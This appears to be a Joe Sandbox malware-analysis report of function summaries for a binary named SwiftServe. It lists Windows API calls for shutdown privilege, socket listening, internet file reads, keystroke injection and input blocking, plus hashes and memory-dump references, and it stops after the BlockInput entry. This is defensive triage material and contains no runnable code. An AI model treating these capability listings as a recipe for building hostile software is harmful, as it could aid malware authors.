Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 3803cec0066e8482f6ec74fe8a6330e384f98e33b66193afd684ba143dc9f4ef
Instruction ID: 59964a5d097aa3c4c1898223b26095e802170a37ad95ee0d568a3499e7ce751c
Opcode Fuzzy Hash: 3803cec0066e8482f6ec74fe8a6330e384f98e33b66193afd684ba143dc9f4ef
Instruction Fuzzy Hash: 733182710083459FC705FB60C8959AFBBE8BE95304F446A6DF5D9A21D2EB20EA0DC763

Function 00E85778 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00E79399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E793E3
Part of subcall function 00E79399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E79410
Part of subcall function 00E79399: GetLastError.KERNEL32 ref: 00E7941D

ExitWindowsEx.USER32(?,00000000), ref: 00E857B4

Strings

, xrefs: 00E857A2
SeShutdownPrivilege, xrefs: 00E85784
@, xrefs: 00E857A7

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 6595af21b28cbc478668ae066158e8e1a7a437530bfeaf6714a15a7653038be4
Instruction ID: bfd02ee9290b1f2a11b0a0a72d01a683cfbb43d82eccf73ee6af9efb2eab1962
Opcode Fuzzy Hash: 6595af21b28cbc478668ae066158e8e1a7a437530bfeaf6714a15a7653038be4
Instruction Fuzzy Hash: 9401F733650B12EEE73872649C8ABBB765CEB04B54F20A567F91FF20D2ED525C048750

Function 00E9696E Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00E969C7
WSAGetLastError.WSOCK32(00000000), ref: 00E969D6
bind.WSOCK32(00000000,?,00000010), ref: 00E969F2
listen.WSOCK32(00000000,00000005), ref: 00E96A01
WSAGetLastError.WSOCK32(00000000), ref: 00E96A1B
closesocket.WSOCK32(00000000,00000000), ref: 00E96A2F

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 1894da89bde877103b971cab26577022c6fec35203826baf0809e1f1f947693a
Instruction ID: 13f733fcf4e2890999f83657f5241cc1c1c182e1edcff045284eeb7fc0556dcf
Opcode Fuzzy Hash: 1894da89bde877103b971cab26577022c6fec35203826baf0809e1f1f947693a
Instruction Fuzzy Hash: 0D21DD312002119FCB00EF64DC89E6EB7E9EF44724F10965AE856B72A1CB70AD008B90

Function 00E21663 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00E229E2: GetWindowLongW.USER32(?,000000EB), ref: 00E229F3

DefDlgProcW.USER32(?,?,?,?,?), ref: 00E21DD6
GetSysColor.USER32(0000000F), ref: 00E21E2A
SetBkColor.GDI32(?,00000000), ref: 00E21E3D

Part of subcall function 00E2166C: DefDlgProcW.USER32(?,00000020,?), ref: 00E216B4

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 84c5b48f78cf97a9dce5562768729a54055742ce722cce7bba9d26f6b35e3df4
Instruction ID: 59470e44fa469c16f28a7662fbf5994e91c26d0846e2fe68e9c94c2397f7ebf0
Opcode Fuzzy Hash: 84c5b48f78cf97a9dce5562768729a54055742ce722cce7bba9d26f6b35e3df4
Instruction Fuzzy Hash: 44A15A74109468FEE72C6B69AC49EBF259DDF6630BF24354AF802F9191CB21AF01C275

Function 00E8C2FF Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00E8C329
_wcscmp.LIBCMT ref: 00E8C359
_wcscmp.LIBCMT ref: 00E8C36E
FindNextFileW.KERNEL32(00000000,?), ref: 00E8C37F
FindClose.KERNEL32(00000000,00000001,00000000), ref: 00E8C3AF

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: 0467ada080fda2d89a326d9bf5e490bf680e2ee70694ea6134f8048e7f79866f
Instruction ID: 0a84cab236fc73a3c814438bb1d8830712f2c3595d72f243473ab30e303fe552
Opcode Fuzzy Hash: 0467ada080fda2d89a326d9bf5e490bf680e2ee70694ea6134f8048e7f79866f
Instruction Fuzzy Hash: 8B51BB756006028FC714EF68D490EAAB7E4EF4A314F20526DE95EA73A1DB30AD05CBA1

Function 00E96E32 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00E98475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E984A0

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00E96E89
WSAGetLastError.WSOCK32(00000000), ref: 00E96EB2
bind.WSOCK32(00000000,?,00000010), ref: 00E96EEB
WSAGetLastError.WSOCK32(00000000), ref: 00E96EF8
closesocket.WSOCK32(00000000,00000000), ref: 00E96F0C

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: f93c59b85cb8be2bb518b95106d421375a359843351984b4a89098f0198fcdf4
Instruction ID: b873f9fc6def2dc4d37088bb34b981b3b5d99c08d54a9a8e127a5a28c1d30445
Opcode Fuzzy Hash: f93c59b85cb8be2bb518b95106d421375a359843351984b4a89098f0198fcdf4
Instruction Fuzzy Hash: 1B4104B6700220AFDB10AF64EC86F6E77E89F04710F009558F949BB3D2DA70AD008B91

Function 00EA59B3 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00EA5A02
IsWindowEnabled.USER32 ref: 00EA5A10
GetForegroundWindow.USER32(?,?,00000001), ref: 00EA5A1D
IsIconic.USER32 ref: 00EA5A2B
IsZoomed.USER32 ref: 00EA5A39

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 78c41c5098c47d1771322ab1f350e51c74c6a47c5cc1720e853d1777fa4e9921
Instruction ID: 5e9baa3dfaf9f7fa10390ad46c7ee8e7c18b366b55fa4537a2e844a8ef905cd0
Opcode Fuzzy Hash: 78c41c5098c47d1771322ab1f350e51c74c6a47c5cc1720e853d1777fa4e9921
Instruction Fuzzy Hash: 4711C8737009219FE7215F269C84A6F7BD9FF89760B005629F846FB241DB30F9018A90

Function 00E8C9DA Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00E8CA75
CoCreateInstance.OLE32(00EB3D3C,00000000,00000001,00EB3BAC,?), ref: 00E8CA8D

Part of subcall function 00E31A36: _memmove.LIBCMT ref: 00E31A77

CoUninitialize.OLE32 ref: 00E8CCFA

Strings

.lnk, xrefs: 00E8CA09, 00E8CA31, 00E8CA3B

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: d64a30ed4b46fae7185e2c3afc93d9170d3c014928138ddf8fb40a256f286ee1
Instruction ID: 187d7080b1a8baff95cef03d070d0a26dc85638642f56bab4fb2479b2b6675f3
Opcode Fuzzy Hash: d64a30ed4b46fae7185e2c3afc93d9170d3c014928138ddf8fb40a256f286ee1
Instruction Fuzzy Hash: ECA15DB1104205AFD304EF64DC81EABB7ECEF94704F00595DF159A7292EB70EA09CBA2

Function 00E60030 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00E60034
__swprintf.LIBCMT ref: 00E60065

Strings

WIN_XPe, xrefs: 00E600A4
%.3d, xrefs: 00E6003F

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: c37e90099ed1e6381f3f557ff61518d7676b2faa36b3a06d40707c30ddaf39a6
Instruction ID: bf7ce83832e99c8bb55246c55956b0c6c9428b8c20287c22142d24b602d171b1
Opcode Fuzzy Hash: c37e90099ed1e6381f3f557ff61518d7676b2faa36b3a06d40707c30ddaf39a6
Instruction Fuzzy Hash: 86D01271884128EECB489A90E945DFB73BCEB08340F102852F546B2041E635974C9B22

Function 00E929BA Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00E92AAD
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00E92AE4

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 639f7265dbeae93b96b35701900406ba7d19c6c60badb38a6ce814975ccb4567
Instruction ID: 73cb35a7ce0352ebcb8218148cdb3cfce3c486261ce1ef9851ebe0d5120e9c3f
Opcode Fuzzy Hash: 639f7265dbeae93b96b35701900406ba7d19c6c60badb38a6ce814975ccb4567
Instruction Fuzzy Hash: 4C41A372A00709BFEF20DE55DC85EBBB7ECEB40758F10506EF705B6141EAB1AE419A60

Function 00E8B976 Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00E8B986
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00E8B9E0
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00E8BA2D

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 9ea26ed1e9fc3a4c97e5552ba11936ac44389a48ce82a2289a865f55027d809a
Instruction ID: 2f9d42caf4fbdf57a0d6ce81f5048a05877d09bd6c14d7857d646de530cde45a
Opcode Fuzzy Hash: 9ea26ed1e9fc3a4c97e5552ba11936ac44389a48ce82a2289a865f55027d809a
Instruction Fuzzy Hash: 43213175A00518EFCB00EFA5E884EAEFBF8FF48310F148199E909A7351DB31A959CB51

Function 00E79399 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00E40FE6: std::exception::exception.LIBCMT ref: 00E4101C
Part of subcall function 00E40FE6: __CxxThrowException@8.LIBCMT ref: 00E41031

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E793E3
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E79410
GetLastError.KERNEL32 ref: 00E7941D

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 5d9a12e341486867c65f1b53ff35703ba6da7aafc7b0ee5d4d135eb86b2fe986
Instruction ID: 252c1786c8fc258a078bafafaf40449df85813456a064619329830c3f78a6fc3
Opcode Fuzzy Hash: 5d9a12e341486867c65f1b53ff35703ba6da7aafc7b0ee5d4d135eb86b2fe986
Instruction Fuzzy Hash: 2B116DB1514205AFD728EF64ED85D2BB7F8EF48750B20856EE459A2241EB70BC45CA60

Function 00E842D5 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00E842FF
DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00E8433C
CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00E84345

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 53234c6a676943bffc19a3cf36766a1a80b479164ae06f2c02e9e92240a2f24c
Instruction ID: 6fdc4a5567f548f17a53566d83b299cd637acdacf3cd34afe0513a7e12620469
Opcode Fuzzy Hash: 53234c6a676943bffc19a3cf36766a1a80b479164ae06f2c02e9e92240a2f24c
Instruction Fuzzy Hash: 681182B1901229BEE7109BE99C48FAFB7BCEB08710F000256B918F71D1D2749D0487A1

Function 00E84F1C Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00E84F45
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00E84F5C
FreeSid.ADVAPI32(?), ref: 00E84F6C

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: df234fcdd9e2a15fc51ce5894c1e582e06f590f3b49744da8964e43a1e22a711
Instruction ID: 7eac40c4b28d0c72bd7c8a65c7439e07ea263bdf11843d1ba67a4c8fd31d5f07
Opcode Fuzzy Hash: df234fcdd9e2a15fc51ce5894c1e582e06f590f3b49744da8964e43a1e22a711
Instruction Fuzzy Hash: 02F04F75A1130DBFDF00DFE0DC89AAEB7BCEF08201F004969A505E2180D7346A048B50

Function 00E81AC6 Relevance: 3.0, APIs: 2, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00E81B01
keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00E81B14

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 4b0670dd0cab6b0a95546523bc5438d25c51746ceaf3a82cc65486c586ad3e9d
Instruction ID: 4edd7f78104873532f20b021aabaa3d5238d8cbf6e14e2787faee078f0bebbbf
Opcode Fuzzy Hash: 4b0670dd0cab6b0a95546523bc5438d25c51746ceaf3a82cc65486c586ad3e9d
Instruction Fuzzy Hash: 99F0377190020DAFDB10DF95D805BFE7BB8EF04315F00814AF959A6292D3799616DF94

Function 00E8A6AD Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00E99B52,?,00EB098C,?), ref: 00E8A6DA
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00E99B52,?,00EB098C,?), ref: 00E8A6EC

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 034215a7d33ab4786b3ee24968a3ca5cc68e68ee827ccfb998722e7dc9332394
Instruction ID: b4d064efed11df37469f0f18e9f3d34787e2a76612b2933feac3ffbed4864bdb
Opcode Fuzzy Hash: 034215a7d33ab4786b3ee24968a3ca5cc68e68ee827ccfb998722e7dc9332394
Instruction Fuzzy Hash: 48F0893550421DBFDB21AFA4CC48FDB77ACAF09751F044256B90CA6151D6309554CBA1

Function 00E78DE9 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E78F27), ref: 00E78DFE
CloseHandle.KERNEL32(?,?,00E78F27), ref: 00E78E10

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 6b594a00c66c74cf428cebf5b94193a7cd274dfc84adae6bb469c6a4023aa4e7
Instruction ID: 8c6b1c9dcbed0421e1885a1a4171c2ffce14d2b4321b53e2ff34a3238112354a
Opcode Fuzzy Hash: 6b594a00c66c74cf428cebf5b94193a7cd274dfc84adae6bb469c6a4023aa4e7
Instruction Fuzzy Hash: D6E0B676010610EFEB266B61FD09E777BEDEB04310B248969F49AA0470DB62ACD0DB50

Function 00E4A385 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,0000FFFF,00E48F87,0000FCD7,?,?,00000001), ref: 00E4A38A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00E4A393

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 06b40810fae06fc8d3624cb70b8af91c1bdf3ad0f9aa7ae8378bc3b3b96fe017
Instruction ID: 4daa03257c501f72d901b1be761ecfb0a36cfcdc59d2fa4c3761c3cd07965faf
Opcode Fuzzy Hash: 06b40810fae06fc8d3624cb70b8af91c1bdf3ad0f9aa7ae8378bc3b3b96fe017
Instruction Fuzzy Hash: 80B09231064208AFCA402B92EC0DB8B3FA8EB44AA2F004110F60E54060CB6264548A91

Function 00E945D5 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00E945F0

Memory Dump Source

